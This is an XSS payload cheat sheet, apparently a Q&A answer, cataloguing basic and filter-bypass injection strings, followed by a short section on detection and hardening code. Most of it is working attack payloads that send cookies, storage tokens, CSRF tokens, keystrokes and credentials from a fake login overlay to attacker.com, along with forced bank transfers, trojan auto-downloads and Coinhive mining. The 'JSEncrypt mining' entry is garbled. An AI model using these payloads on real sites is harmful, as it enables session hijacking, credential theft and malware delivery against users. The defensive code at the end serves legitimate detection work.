Answer
An XSS payload is the malicious code fragment an attacker uses to carry out a cross-site scripting attack. Knowing the common XSS payloads is essential for detecting and defending against XSS. Payloads fall into several types, each with its own attack scenarios and filter-bypass tricks.
Basic XSS payloads
1. Script tag injection
The most basic payloads:
```html
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
```
Variants:
```html
<script>alert(String.fromCharCode(88,83,83))</script>
<script>alert(/XSS/.source)</script>
<script>alert`XSS`</script>
```
2. Image tag injection
The onerror event:
```html
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
```
Variants:
```html
<img src=x onerror=alert(1)>
<img src=x onerror=alert(1) />
<img src=x onerror=alert(1)//>
```
3. SVG tag injection
The onload event:
```html
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">
```
Variants:
```html
<svg onload="alert(1)">
<svg onload='alert(1)'>
<svg onload=alert(1)>
```
Advanced XSS payloads
1. Event handler injection
Common events:
```html
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onblur=alert(1)>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus>
<input onchange=alert(1) autofocus>
<select onfocus=alert(1) autofocus>
<select onblur=alert(1) autofocus>
<select onchange=alert(1) autofocus>
<textarea onfocus=alert(1) autofocus>
<textarea onblur=alert(1) autofocus>
<textarea onchange=alert(1) autofocus>
<details open ontoggle=alert(1)>
<details open onmouseover=alert(1)>
<details open onclick=alert(1)>
```
2. iframe injection
The javascript: protocol:
```html
<iframe src="javascript:alert(1)"></iframe>
<iframe src='javascript:alert(1)'></iframe>
<iframe src=javascript:alert(1)></iframe>
```
The data: protocol:
```html
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
```
3. form injection
The formaction attribute:
```html
<form><button formaction=javascript:alert(1)>Click</button></form>
<form><input type=submit formaction=javascript:alert(1) value=Click></form>
```
The formtarget attribute:
```html
<form action="javascript:alert(1)"><input type=submit value=Click></form>
<form action="data:text/html,<script>alert(1)</script>"><input type=submit value=Click></form>
```
Filter-bypass payloads
1. Case bypass
Variants:
```html
<ScRiPt>alert(1)</ScRiPt>
<SCRIPT>alert(1)</SCRIPT>
<Img src=x oNeRrOr=alert(1)>
```
2. Encoding bypass
HTML entity encoding:
```html
<script>alert(1)</script>
<script>alert(1)</script>
<script>alert(1)</script>
```
URL encoding:
```html
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
```
JavaScript encoding:
```html
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>
<script>\x61\x6c\x65\x72\x74(1)</script>
```
3. Comment bypass
Variants:
```html
<!--><script>alert(1)</script>-->
<!----><script>alert(1)</script><!-->
<!--><img src=x onerror=alert(1)>-->
```
4. Whitespace bypass
Variants:
```html
<img/src=x/onerror=alert(1)>
<svg/onload=alert(1)>
<script>alert(1)//>
```
5. Quote bypass
Variants:
```html
<script>alert(1)</script>
<script>alert`1`</script>
<script>alert(/1/)</script>
<script>alert(String.fromCharCode(49))</script>
```
Cookie-theft payloads
1. Basic cookie theft
Sending it directly:
```html
<script>
const stolenCookie = document.cookie;
fetch('http://attacker.com/steal?cookie=' + encodeURIComponent(stolenCookie));
</script>
```
Using an Image tag:
```html
<img src="http://attacker.com/steal?cookie=123" onerror="this.src='http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie)">
```
2. Advanced cookie theft
Using XMLHttpRequest:
```html
<script>
const xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
xhr.send();
</script>
```
Using a WebSocket:
```html
<script>
const ws = new WebSocket('ws://attacker.com/steal');
ws.onopen = function() {
  ws.send(document.cookie);
};
</script>
```
Session-hijacking payloads
1. Session ID theft
Stealing localStorage:
```html
<script>
const localStorageData = JSON.stringify(localStorage);
fetch('http://attacker.com/steal?localStorage=' + encodeURIComponent(localStorageData));
</script>
```
Stealing sessionStorage:
```html
<script>
const sessionStorageData = JSON.stringify(sessionStorage);
fetch('http://attacker.com/steal?sessionStorage=' + encodeURIComponent(sessionStorageData));
</script>
```
2. Token theft
Stealing a JWT token:
```html
<script>
const token = localStorage.getItem('token');
fetch('http://attacker.com/steal?token=' + encodeURIComponent(token));
</script>
```
Phishing payloads
1. Fake login form
Injecting a fake form:
```html
<script>
const fakeForm = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
  <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
    <h3>会话已过期,请重新登录</h3>
    <input type="text" id="username" placeholder="用户名">
    <input type="password" id="password" placeholder="密码">
    <button onclick="stealCredentials()">登录</button>
  </div>
</div>
`;
document.body.innerHTML += fakeForm;
function stealCredentials() {
  const username = document.getElementById('username').value;
  const password = document.getElementById('password').value;
  fetch('http://attacker.com/steal', {
    method: 'POST',
    body: JSON.stringify({ username, password })
  });
}
</script>
```
2. Redirect attack
Malicious redirect:
```html
<script>
window.location = 'http://phishing.com/login?ref=' + encodeURIComponent(document.location.href);
</script>
```
Using a meta tag:
```html
<meta http-equiv="refresh" content="0;url=http://phishing.com/login">
```
Keylogging payloads
1. Basic keylogging
Recording every keystroke:
```html
<script>
let keylog = '';
document.addEventListener('keydown', function(e) {
  keylog += e.key;
  if (keylog.length > 100) {
    fetch('http://attacker.com/keylog', {
      method: 'POST',
      body: JSON.stringify({ keylog })
    });
    keylog = '';
  }
});
</script>
```
2. Advanced keylogging
Recording context with each key:
```html
<script>
let keylog = [];
document.addEventListener('keydown', function(e) {
  keylog.push({
    key: e.key,
    timestamp: Date.now(),
    url: window.location.href,
    element: e.target.tagName
  });
  if (keylog.length > 50) {
    fetch('http://attacker.com/keylog', {
      method: 'POST',
      body: JSON.stringify({ keylog })
    });
    keylog = [];
  }
});
</script>
```
Data-tampering payloads
1. Modifying page content
Changing text content:
```html
<script>
document.getElementById('bank-balance').textContent = '999999.99';
document.getElementById('transaction-history').innerHTML = '<p>无交易记录</p>';
</script>
```
2. Modifying links
Rewriting every link:
```html
<script>
const links = document.querySelectorAll('a');
links.forEach(link => {
  link.href = 'http://phishing.com/login?redirect=' + encodeURIComponent(link.href);
});
</script>
```
CSRF-assisting payloads
1. Sending requests automatically
Sending a GET request:
```html
<script>
fetch('http://bank.com/transfer?to=attacker&amount=10000', {
  credentials: 'include'
});
</script>
```
Sending a POST request:
```html
<script>
fetch('http://bank.com/transfer', {
  method: 'POST',
  headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
  body: 'to=attacker&amount=10000',
  credentials: 'include'
});
</script>
```
2. Stealing the CSRF token
Stealing the token from a meta tag:
```html
<script>
const csrfToken = document.querySelector('meta[name="csrf-token"]').content;
fetch('http://attacker.com/steal?token=' + encodeURIComponent(csrfToken));
</script>
```
Malware-distribution payloads
1. Downloading a malicious file
Automatic download:
```html
<script>
const link = document.createElement('a');
link.href = 'http://malicious.com/trojan.exe';
link.download = 'update.exe';
link.click();
</script>
```
2. Luring the user into downloading
Showing a fake update prompt:
```html
<script>
const updateMessage = `
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.8);z-index:9999;">
  <div style="position:absolute;top:50%;left:50%;transform:translate(-50%,-50%);background:white;padding:20px;border-radius:5px;">
    <h3>发现新版本,请点击下载更新</h3>
    <a href="http://malicious.com/update.exe" download>下载更新</a>
  </div>
</div>
`;
document.body.innerHTML += updateMessage;
</script>
```
Web-mining payloads
1. Using Coinhive
Basic mining:
```html
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.User('site-key');
miner.start();
</script>
```
2. Using JSEncrypt
Encryption-based mining:
```html
<script src="https://cdnjs.cloudflare.com/ajax/libs/jsencrypt/3.0.0/jsencrypt.min.js"></script>
<script>
var crypt = new JSEncrypt();
// perform encryption-based mining
</script>
```
Detection and protection
1. Detecting payloads
Common detection methods:
- Search for `<script>` tags
- Search for the `javascript:` protocol
- Search for event handlers such as `onerror` and `onload`
- Search for dangerous functions such as `eval()` and `new Function()`
- Match malicious patterns with regular expressions
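As an added example (not code from the original answer), the detection methods above combined into one normalizing scanner in JavaScript. Matching the raw input with regular expressions misses the case, encoding, comment and whitespace variants listed earlier, so the input is first URL-decoded, entity-decoded, JS-escape-decoded, stripped of comments the way the HTML parser closes them, and lower-cased; the rules are then applied to that canonical form. The rule names and the sample inputs at the bottom are this example's own constructions, built from the variants shown on this page.

```javascript
// Added example (not from the original page): a normalizing detector for the
// payload patterns listed in this answer. Rule names and samples are this
// example's own constructions.

const codePoint = n => (n <= 0x10ffff ? String.fromCodePoint(n) : '');

// Undo the HTML entity encoding described in the "encoding bypass" section.
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => codePoint(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => codePoint(parseInt(d, 10)))
    .replace(/&lt;/gi, '<')
    .replace(/&gt;/gi, '>')
    .replace(/&quot;/gi, '"')
    .replace(/&(?:#39|apos);/gi, "'")
    .replace(/&amp;/gi, '&');
}

// Canonical form: bounded URL decoding, entity decoding, JS escape decoding,
// comment removal and case folding, so the bypass variants collapse together.
function normalize(input) {
  let s = String(input);
  for (let i = 0; i < 3; i++) {
    let decoded;
    try { decoded = decodeURIComponent(s); } catch (_) { break; } // malformed % sequence
    if (decoded === s) break;
    s = decoded;
  }
  s = decodeHtmlEntities(s)
    .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  // The HTML parser closes "<!-->" and "<!--->" immediately as empty comments,
  // so "<!--><script>" still runs; strip comments the way the parser does.
  s = s.replace(/<!--(?:-?>|[\s\S]*?-->)/g, '');
  return s.replace(/\s+/g, ' ').toLowerCase();
}

// Patterns from the detection list, applied to the lower-cased canonical form.
// "alert(" is included because it is the probe call used in every payload above.
const RULES = [
  { name: 'script-tag',      re: /<\s*script\b/ },
  { name: 'javascript-uri',  re: /javascript\s*:/ },
  { name: 'data-html-uri',   re: /data\s*:\s*text\/html/ },
  { name: 'event-handler',   re: /\bon[a-z]+\s*=/ },
  { name: 'suspicious-call', re: /\b(?:eval|alert|settimeout|setinterval)\s*\(|new\s+function\s*\(/ },
  { name: 'dangerous-tag',   re: /<\s*(?:iframe|svg|img|body|meta|form|details)\b/ },
];

// Returns the names of the rules the input triggers (empty array when clean).
function detect(input) {
  const canonical = normalize(input);
  return RULES.filter(rule => rule.re.test(canonical)).map(rule => rule.name);
}

// Constructed samples built from the variants shown earlier on this page.
const SAMPLES = [
  '<ScRiPt>alert(1)</ScRiPt>',
  '%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E',
  '<!--><script>alert(1)</script>-->',
  '&#x3c;svg/onload=&#x61;lert(1)&#x3e;',
  '<iframe src=javascript:\\u0061lert(1)></iframe>',
  'Hello <b>world</b> &amp; 100% legit',
];
for (const s of SAMPLES) console.log(JSON.stringify(s), '->', detect(s));
```

This kind of matcher is a detection aid (for log review, WAF rules or test suites), not a substitute for output encoding: a blocklist can always lag behind a new variant, and the `\bon[a-z]+\s*=` rule in particular will also fire on harmless text such as `onion=`. Keep the normalization bounded (three URL-decode rounds here) so a pathological input cannot make the scanner loop.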
2. Defending against payloads
Protective measures:
- Encode all user input before output
- Use a Content Security Policy
- Set the HttpOnly flag on cookies
- Use safe DOM APIs
- Implement input validation and filtering
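As an added example (not from the original answer), the protective measures above in one small Node.js module: context-aware output encoding, a URL allow-list that rejects the `javascript:` and `data:` schemes used by the iframe and form payloads, a render function shown in its unsafe and hardened forms, and the response headers that add a Content Security Policy and an HttpOnly session cookie. The function names, the comment object and the `app.example` base URL are assumptions made for this illustration.

```javascript
// Added example (not from the original page): output encoding, URL validation
// and the response headers behind the protection list. Names are illustrative.

// Encode a value for insertion into HTML text or a quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, ch => map[ch]);
}

// Allow only http(s) links: rejects the javascript: and data: schemes the
// iframe and form payloads rely on. Returns '#' for anything else.
function safeHref(url) {
  try {
    const parsed = new URL(url, 'https://app.example/'); // assumed base for relative links
    return (parsed.protocol === 'https:' || parsed.protocol === 'http:') ? url : '#';
  } catch (_) {
    return '#';
  }
}

// Vulnerable: untrusted fields are concatenated straight into markup.
function renderCommentUnsafe(comment) {
  return `<p class="author">${comment.author}</p><a href="${comment.link}">profile</a>`;
}

// Hardened: every untrusted value is encoded for its context first.
function renderComment(comment) {
  return `<p class="author">${escapeHtml(comment.author)}</p>` +
         `<a href="${escapeHtml(safeHref(comment.link))}">profile</a>`;
}

// Response headers: the CSP blocks inline scripts, inline event handlers and
// third-party script hosts (including the mining libraries shown above);
// HttpOnly keeps document.cookie from exposing the session id to script.
function securityHeaders(sessionId) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
    'Set-Cookie': `session=${sessionId}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Constructed sample: the author field carries a script tag, the link a javascript: URI.
const sampleComment = { author: '<script>alert(1)</script>', link: 'javascript:alert(1)' };
console.log('unsafe:', renderCommentUnsafe(sampleComment));
console.log('safe:  ', renderComment(sampleComment));
console.log(securityHeaders('<session-id-placeholder>'));
```

`safeHref` relies on the WHATWG URL parser, which strips leading whitespace and embedded tabs and newlines before reading the scheme, so the obfuscated `java\tscript:` style variants resolve to the `javascript:` protocol and are rejected with the plain ones. When the page is rendered in the browser rather than on the server, the same principle applies through the safe DOM APIs the list mentions: assign `textContent` for text and `href` through the same allow-list, and avoid `innerHTML` for untrusted data.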
Summary
XSS payloads are the tools attackers use to carry out XSS attacks, and knowing the common ones is essential for detecting and defending against XSS. The common XSS payloads include:
- Basic payloads: script tags, image tags, SVG tags
- Advanced payloads: event handlers, iframe, form
- Filter-bypass payloads: case, encoding, comments, whitespace, quotes
- Cookie-theft payloads: direct sending, Image tag
- Session-hijacking payloads: localStorage, sessionStorage and token theft
- Phishing payloads: fake login forms, redirect attacks
- Keylogging payloads: recording keystrokes, recording context
- Data-tampering payloads: modifying page content, modifying links
- CSRF-assisting payloads: sending requests automatically, stealing the CSRF token
- Malware-distribution payloads: downloading malicious files, luring the user into downloading
- Web-mining payloads: Coinhive, JSEncrypt
By understanding these payloads, developers can better detect and defend against XSS attacks.